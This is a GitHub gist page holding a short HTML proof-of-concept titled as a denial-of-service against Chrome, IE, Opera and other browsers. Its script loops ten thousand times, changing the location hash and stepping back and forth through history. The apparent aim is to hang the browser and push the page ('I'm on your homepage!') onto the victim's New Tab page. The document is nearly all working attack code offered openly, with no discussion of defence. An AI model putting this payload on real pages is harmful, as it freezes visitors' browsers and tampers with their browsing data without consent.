Skip to content

Instantly share code, notes, and snippets.

@Ajedi32
Last active September 14, 2018 20:37
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Ajedi32/f59485360e6e7f27d8c7ed1dc2dec75a to your computer and use it in GitHub Desktop.
Save Ajedi32/f59485360e6e7f27d8c7ed1dc2dec75a to your computer and use it in GitHub Desktop.
Chrome / IE / Opera / ... DoS
<title>I'm on your homepage!</title>
<script>
for(let i=0; i<10000; ++i) {
document.location.href="#";
window.history.back();
window.history.forward();
}
</script>
<p>This page should soon be showing up on your New Tab page</p>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment